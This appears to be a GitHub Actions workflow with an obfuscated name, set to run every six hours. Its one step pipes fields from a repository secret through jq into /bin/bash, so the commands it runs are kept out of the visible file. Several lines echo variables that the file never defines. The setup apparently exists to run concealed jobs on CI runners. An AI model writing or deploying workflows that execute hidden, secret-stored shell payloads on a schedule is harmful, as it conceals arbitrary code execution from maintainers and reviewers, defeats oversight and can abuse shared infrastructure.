name: yuangandan3456

on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuangandan3456
        env:
          vobj4: ${{ secrets.vobj4 }}
        run: |
          echo $vobj4 | jq -r .r67860 | /bin/bash
          echo $caat07043 | jq -r .dq41 | /bin/bash
          echo $pphvt4 | jq -r .vi4 | /bin/bash
          echo $i3781 | jq -r .vzgtu7 | /bin/bash
          echo $gcej24062 | jq -r .cyy0 | /bin/bash

